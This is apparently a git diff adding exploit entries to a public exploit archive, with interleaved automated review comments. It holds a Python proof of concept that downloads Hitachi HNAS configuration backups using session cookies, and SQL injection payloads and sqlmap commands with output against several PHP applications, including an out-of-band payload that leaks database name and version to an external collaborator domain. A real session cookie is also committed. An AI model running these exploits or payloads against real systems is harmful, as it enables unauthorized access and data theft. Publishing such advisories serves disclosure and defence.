diff --git a/exploits/hardware/remote/51915.py b/exploits/hardware/remote/51915.py
new file mode 100755
index 000000000..c99a2e359
--- /dev/null
+++ b/exploits/hardware/remote/51915.py
@@ -0,0 +1,92 @@
+# Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure
+# CVE: CVE-2023-6538
+# Date: 2023-12-13
+# Exploit Author: Arslan Masood (@arszilla)
+# Vendor: https://www.hitachivantara.com/
+# Version: < 14.8.7825.01
+# Tested On: 13.9.7021.04
+
+import argparse
+from os import getcwd
+
+import requests
+
+parser = argparse.ArgumentParser(
+ description="CVE-2023-6538 PoC",
+ usage="./CVE-2023-6538.py --host --id --sso "
+ )
+
+# Create --host argument:
+parser.add_argument(
+ "--host",
+ required=True,
+ type=str,
+ help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
+ )
+
+# Create --id argument:
+parser.add_argument(
+ "--id",
+ required=True,
+ type=str,
+ help="JSESSIONID cookie value"
+ )
+
+# Create --sso argument:
+parser.add_argument(
+ "--sso",
+ required=True,
+ type=str,
+ help="JSESSIONIDSSO cookie value"
+ )
+
+# Create --id argument:
+parser.add_argument(
+ "--id",
+ required=True,
+ type=str,
+ help="Server ID value"
+ )
+
+args = parser.parse_args()
+
+def download_file(hostname, jsessionid, jsessionidsso, serverid):
+ # Set the filename:
+ filename = "registry_data.tgz"
+
+ # Vulnerable SMU URL:
+ smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"
+
+ # GET request cookies
+ smu_cookies = {
+ "JSESSIONID": jsessionid,
+ "JSESSIONIDSSO": jsessionidsso
+ }
+
+ # GET request headers:
+ smu_headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+ "Accept-Language": "en-US,en;q=0.5",
+ "Accept-Encoding": "gzip, deflate",
+ "Dnt": "1",
+ "Referer": f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",
+ "Upgrade-Insecure-Requests": "1",
+ "Sec-Fetch-Dest": "document",
+ "Sec-Fetch-Mode": "navigate",
+ "Sec-Fetch-Site": "same-origin",
+ "Sec-Fetch-User": "?1",
+ "Te": "trailers",
+ "Connection": "close"
+ }
+
+ # Send the request:
+ with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
+ with open(filename, 'wb') as backup_archive:
+ # Write the zip file to the CWD:
+ backup_archive.write(file_download.content)
+
+ print(f"{filename} has been downloaded to {getcwd()}")
+
+if __name__ == "__main__":
+ download_file(args.host, args.id, args.sso, args.id)
\ No newline at end of file
diff --git a/exploits/php/webapps/51911.txt b/exploits/php/webapps/51911.txt
new file mode 100644
index 000000000..b60c70998
--- /dev/null
+++ b/exploits/php/webapps/51911.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Employee Management System 1.0 - 'admin_id' SQLi
+# Date: 20-03-2024
+# Exploit Author: Shubham Pandey
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html
+# Version: 1.0
+# Tested on: Windows, Linux
+# CVE : CVE-2024-28595
+# Description: SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php.
+# POC:
+1. Here we go to : http://127.0.0.1/taskmatic/index.php
+2. Now login with default Username and Password.
+3. Visit the URL:
+http://127.0.0.1/taskmatic/update-admin.php?admin_id=3'||(SELECT 0x697a7843
+WHERE 5649=5649 AND (SELECT 2097 FROM (SELECT(SLEEP(5)))JzJH))||'
+4. Page will load for 5 seconds because of time-based sql injection
+# Reference:
+https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md
\ No newline at end of file
diff --git a/exploits/php/webapps/51912.txt b/exploits/php/webapps/51912.txt
new file mode 100644
index 000000000..93600a875
--- /dev/null
+++ b/exploits/php/webapps/51912.txt
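Review bot: `download_file` in 51915.py writes whatever body comes back to `registry_data.tgz` and prints that it has been downloaded without checking the status code, so any error page or login redirect (for example from a fixed release or an expired session) is reported as success and anyone using the script to confirm remediation gets a false positive; add `file_download.raise_for_status()` before the `open()` call. The request also hard-codes `verify=False`, so the `JSESSIONID`/`JSESSIONIDSSO` values are sent over a TLS connection whose certificate is never checked; that is better exposed as an explicit opt-in flag than left as the default. Separately, the parser registers `--id` twice (session cookie and Server ID), which argparse rejects as a conflicting option string, and the `__main__` call passes `args.id` for both `jsessionid` and `serverid`.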
@@ -0,0 +1,45 @@
+# Exploit Title: Blood Bank 1.0 - 'bid' SQLi
+# Date: 2023-11-15
+# Exploit Author: Ersin Erenler
+# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
+# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
+# Version: 1.0
+# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
+# CVE : CVE-2023-46022
+
+-------------------------------------------------------------------------------
+
+# Description:
+
+The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to exploit the parameter using Burp Collaborator to initiate OOB SQL injection attacks. Through this technique, an attacker can potentially extract sensitive information from the databases.
+
+Vulnerable File: /delete.php
+
+Parameter Name: bid
+
+# Proof of Concept:
+----------------------
+
+1. Intercept the request to cancel.php via Burp Suite
+2. Inject the payload to the vulnerable parameters
+3. Payload: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b'
+4. Example request for bid parameter:
+---
+
+GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.domain.oastify.com\\a.txt')))%2b' HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Referer: http://localhost/bloodbank/bloodinfo.php
+Cookie: PHPSESSID=
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+---
+5. Database and version information is seized via Burp Suite Collaborator
\ No newline at end of file
diff --git a/exploits/php/webapps/51913.txt b/exploits/php/webapps/51913.txt
new file mode 100644
index 000000000..82b1fd979
--- /dev/null
+++ b/exploits/php/webapps/51913.txt
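Review bot: Step 1 of the proof of concept in 51912.txt names `cancel.php`, while the description, the "Vulnerable File" field and the example request all point at `/delete.php`; the step should read `1. Intercept the request to delete.php via Burp Suite` so that anyone triaging the entry or writing a detection rule watches the right endpoint. The description attributes the flaw only to "inadequate protection mechanisms" and gives no remediation. A closing line such as `# Mitigation: validate bid as an integer and bind it in a prepared statement` would make the advisory usable by defenders; this assumes `bid` is a numeric id, as the example value suggests.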
@@ -0,0 +1,43 @@
+# Exploit Title: Simple Task List 1.0 - 'status' SQLi
+# Date: 2023-11-15
+# Exploit Author: Ersin Erenler
+# Vendor Homepage: https://code-projects.org/simple-task-list-in-php-with-source-code
+# Software Link: https://download-media.code-projects.org/2020/12/Simple_Task_List_In_PHP_With_Source_Code.zip
+# Version: 1.0
+# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
+# CVE : CVE-2023-46023
+
+-------------------------------------------------------------------------------
+
+# Description:
+
+Simple Task List V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'status' parameter in the addTask.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.
+
+Vulnerable File: /addTask.php
+
+Parameter Name: status
+
+# Proof of Concept:
+----------------------
+
+1. Register and login the system
+2. Add a project and a task
+3. Then use the sqlmap to exploit
+4. sqlmap -u "http://localhost/Tasklist/addTask.php" --headers "Cookie: PHPSESSID=" --method POST --data "name=test&status=N" -p status --risk 3 --level 5 --dbms mysql --batch --current-db
+
+# SQLMap Response:
+----------------------
+---
+Parameter: status (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: name=test&status=N'||(SELECT 0x59506356 WHERE 1189=1189 AND 7323=7323)||'
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: name=test&status=N'||(SELECT 0x6b786b49 WHERE 7851=7851 AND (SELECT 9569 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(9569=9569,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: name=test&status=N'||(SELECT 0x5669775a WHERE 4483=4483 AND (SELECT 3096 FROM (SELECT(SLEEP(5)))iFlC))||'
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/51914.txt b/exploits/php/webapps/51914.txt
new file mode 100644
index 000000000..d30e1a308
--- /dev/null
+++ b/exploits/php/webapps/51914.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi
+# Date: 2023-11-15
+# Exploit Author: Ersin Erenler
+# Vendor Homepage: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql
+# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17645
+# Version: 1.0
+# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
+# CVE : CVE-2023-46024
+
+-------------------------------------------------------------------------------
+
+# Description:
+
+Teacher Subject Allocation Management System V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'searchdata' parameter in the index.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.
+
+Vulnerable File: /index.php
+
+Parameter Name: searchdata
+
+# Proof of Concept:
+----------------------
+
+Execute sqlmap using either the 'searchdata' parameter to retrieve the current database:
+
+sqlmap -u "http://localhost/Tsas" --method POST --data "searchdata=test&search=" -p searchdata --risk 3 --level 3 --dbms mysql --batch --current-db
+
+SQLMap Response:
+----------------------
+---
+Parameter: searchdata (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: searchdata=test%' AND 3912=3912 AND 'qxHV%'='qxHV&search=
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: searchdata=test%' AND (SELECT 1043 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(1043=1043,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kewe%'='kewe&search=
+
+ Type: stacked queries
+ Title: MySQL >= 5.0.12 stacked queries (comment)
+ Payload: searchdata=test%';SELECT SLEEP(5)#&search=
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: searchdata=test%' AND (SELECT 8862 FROM (SELECT(SLEEP(5)))GqzT) AND 'wylU%'='wylU&search=
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 15 columns
+ Payload: searchdata=test%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x784e7a47626a794a74456975444c5a4c64734556414658476e75684c4a716f6173724b6b6a685163,0x717a787171)-- -&search=
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/51916.txt b/exploits/php/webapps/51916.txt
new file mode 100644
index 000000000..aa7a2dfbc
--- /dev/null
+++ b/exploits/php/webapps/51916.txt
@@ -0,0 +1,42 @@
+# Title: CSZCMS v1.3.0 - SQL Injection (Authenticated)
+# Author: Abdulaziz Almetairy
+# Date: 27/01/2024
+# Vendor: https://www.cszcms.com/
+# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
+# Reference: https://github.com/oh-az
+# Tested on: Windows 11, MySQL, Apache
+
+
+# 1 - Log in to the admin portal
+
+http://localhost/cszcms/admin/login
+
+# 2 - Navigate to General Menu > Member Users.
+
+# 3 Click the 'View' button next to any username.
+
+# 4 Intercept the request
+
+GET /cszcms/admin/members/view/1 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdss
+Upgrade-Insecure-Requests: 1
+
+
+
+# 5 Modify the paramter
+
+/cszcms/admin/members/view/1
+
+to
+
+/cszcms/admin/members/view/'or(sleep(10))#
+
+and url encode all characters
+
+/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 02b7bc95a..2f9486d79 100644
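Review bot: The description in 51914.txt limits the impact to "unauthorized access and extraction of sensitive information", but the sqlmap output in the same file reports a `stacked queries` technique, which normally means additional statements can be executed and data integrity is at risk as well; the description should say so, because it changes how the finding is triaged. The sqlmap command carries no session cookie, which suggests the search form is reachable without logging in; if that is the case the title should state it, the way 51916 marks itself "(Authenticated)". The sentence "using either the 'searchdata' parameter" has a stray "either".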
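Review bot: The intercepted request in 51916.txt commits a complete session cookie (`86112035d26bb3c291899278f9ab4fb2_cszsess=...`), whereas 51912.txt and 51913.txt leave `PHPSESSID=` empty; replace the value with a placeholder such as `Cookie: <session cookie>` so that no session identifier is published with the advisory. The write-up also never names the vulnerable input; from the steps it appears to be the trailing path segment of `/admin/members/view/`, and a header line like `# Vulnerable parameter: member id path segment of /admin/members/view/` plus a one-line mitigation (cast the id to an integer before it reaches the query) would give defenders something to act on.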
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3642,6 +3642,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,,2020-02-05,2020-02-05,0,,,,,,
 47405,exploits/hardware/remote/47405.pl,"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure",2019-09-23,"Todor Donev",remote,hardware,,2019-09-23,2019-09-23,0,,,,,,
 10451,exploits/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",remote,hardware,,2009-12-13,,1,CVE-2009-4462;OSVDB-63325;OSVDB-61018,,,,,
+51915,exploits/hardware/remote/51915.py,"HNAS SMU 14.8.7825 - Information Disclosure",2024-03-20,"Arslan Masood",remote,hardware,,2024-03-20,2024-03-20,0,CVE-2023-6538,,,,,
 45052,exploits/hardware/remote/45052.py,"HomeMatic Zentrale CCU2 - Remote Code Execution",2018-07-18,"Kacper Szurek",remote,hardware,,2018-07-18,2018-07-18,0,,,,,,
 36429,exploits/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 - Web Interface Log Viewer Page URI Cross-Site Scripting",2011-12-08,"Silent Dream",remote,hardware,,2011-12-08,2015-03-19,1,CVE-2011-4836;OSVDB-77588,,,,,https://www.securityfocus.com/bid/50978/info
 51885,exploits/hardware/remote/51885.py,"Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)",2024-03-14,ByteHunter,remote,hardware,,2024-03-14,2024-03-14,0,CVE-2023-3710,,,,,
@@ -15006,6 +15007,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8053,exploits/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,webapps,php,,2009-02-12,,1,OSVDB-51978,,,,,
 28574,exploits/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",webapps,php,,2006-09-14,2013-09-27,1,CVE-2006-4829;OSVDB-28834,,,,,https://www.securityfocus.com/bid/20026/info
 5234,exploits/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,webapps,php,,2008-03-10,2016-11-23,1,OSVDB-42778;CVE-2008-1313,,,,http://www.exploit-db.combloo.v.1.00.tgz,
+51912,exploits/php/webapps/51912.txt,"Blood Bank 1.0 - 'bid' SQLi",2024-03-20,"Ersin Erenler",webapps,php,,2024-03-20,2024-03-20,0,CVE-2023-46022,,,,,
 50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",2021-10-01,"Nitin Sharma",webapps,php,,2021-10-01,2021-10-28,0,,,,,,
 51833,exploits/php/webapps/51833.txt,"Blood Bank v1.0 - Multiple SQL Injection",2024-02-28,"Ersin Erenler",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
 51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-06,1,,,,,,
@@ -16542,6 +16544,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51703,exploits/php/webapps/51703.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
 51704,exploits/php/webapps/51704.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
 51863,exploits/php/webapps/51863.py,"CSZ CMS Version 1.3.0 - Authenticated Remote Command Execution",2024-03-06,tmrswrr,webapps,php,,2024-03-06,2024-03-06,0,,,,,,
+51916,exploits/php/webapps/51916.txt,"CSZCMS v1.3.0 - SQL Injection (Authenticated)",2024-03-20,"Abdulaziz Almetairy",webapps,php,,2024-03-20,2024-03-20,0,,,,,,
 31517,exploits/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",webapps,php,80,2014-02-07,2014-02-07,0,CVE-2013-2639;OSVDB-103117,,,,,
 11063,exploits/php/webapps/11063.txt,"CU Village CMS Site 1.0 - 'print_view' Blind SQL Injection",2010-01-08,Red-D3v1L,webapps,php,,2010-01-07,,1,,,,,,
 11495,exploits/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-17,,1,,,,,,
@@ -17932,6 +17935,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10069,exploits/php/webapps/10069.php,"Empire CMS 47 - SQL Injection",2009-10-05,"Securitylab Security Research",webapps,php,,2009-10-04,,1,CVE-2009-2269;OSVDB-55517,,,,,
 50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",2021-11-10,"İlhami Selamet",webapps,php,,2021-11-10,2021-11-10,0,,,,,,
 50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",2021-11-10,"Ragavender A G",webapps,php,,2021-11-10,2021-11-10,0,,,,,,
+51911,exploits/php/webapps/51911.txt,"Employee Management System 1.0 - 'admin_id' SQLi",2024-03-20,"Shubham Pandey",webapps,php,,2024-03-20,2024-03-20,0,CVE-2024-28595,,,,,
 48882,exploits/php/webapps/48882.txt,"Employee Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
 48881,exploits/php/webapps/48881.txt,"Employee Management System 1.0 - Cross Site Scripting (Stored)",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
 51803,exploits/php/webapps/51803.txt,"Employee Management System v1 - 'email' SQL Injection",2024-02-19,SoSPiro,webapps,php,,2024-02-19,2024-02-19,0,,,,,,
@@ -29683,6 +29687,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49758,exploits/php/webapps/49758.txt,"Simple Student Information System 1.0 - SQL Injection (Authentication Bypass)",2021-04-13,GaluhID,webapps,php,,2021-04-13,2021-04-13,0,,,,,,
 50740,exploits/php/webapps/50740.txt,"Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2022-02-16,0,,,,,,
 50522,exploits/php/webapps/50522.txt,"Simple Subscription Website 1.0 - SQLi Authentication Bypass",2021-11-15,"Daniel Haro",webapps,php,,2021-11-15,2021-11-15,0,CVE-2021-43140,,,,,
+51913,exploits/php/webapps/51913.txt,"Simple Task List 1.0 - 'status' SQLi",2024-03-20,"Ersin Erenler",webapps,php,,2024-03-20,2024-03-20,0,,,,,,
 51273,exploits/php/webapps/51273.txt,"Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-05-05,1,CVE-2022-40032,,,,,
 7444,exploits/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,webapps,php,,2008-12-13,,1,OSVDB-50712;CVE-2008-5763;OSVDB-50711;CVE-2008-5762,,,,,
 50204,exploits/php/webapps/50204.txt,"Simple Water Refilling Station Management System 1.0 - Authentication Bypass",2021-08-16,"Matt Sorrell",webapps,php,,2021-08-16,2021-08-16,0,,,,,,
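Review bot: The row added for 51913 leaves the codes column empty (`...,2024-03-20,2024-03-20,0,,,,,,`), although 51913.txt in this same commit declares `# CVE : CVE-2023-46023` and the sibling rows for 51912 and 51914 carry their CVE ids. The row should end `,0,CVE-2023-46023,,,,,` so that CVE-based lookups of the index, which is how most defenders match entries against their vulnerability scans, find this advisory.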
@@ -30650,6 +30655,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9512,exploits/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,webapps,php,,2009-08-24,,1,,,,,,
 37151,exploits/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",webapps,php,80,2015-05-29,2015-05-29,0,OSVDB-122580,,,,,
 14203,exploits/php/webapps/14203.txt,"TCW PHP Album - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",webapps,php,,2010-07-04,2010-07-04,1,CVE-2010-2715;CVE-2010-2714;OSVDB-66314;OSVDB-66313,,,,http://www.exploit-db.comtcwphpalbum-1.0.tar.gz,
+51914,exploits/php/webapps/51914.txt,"Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi",2024-03-20,"Ersin Erenler",webapps,php,,2024-03-20,2024-03-20,0,CVE-2023-46024,,,,,
 50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",2021-06-16,nhattruong,webapps,php,,2021-06-16,2021-06-16,0,,,,,,
 50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-06-16,nhattruong,webapps,php,,2021-06-16,2021-06-16,0,,,,,,
 49562,exploits/php/webapps/49562.sh,"Teachers Record Management System 1.0 - 'searchteacher' SQL Injection",2021-02-15,"Soham Bakore",webapps,php,,2021-02-15,2021-02-15,0,,,,,,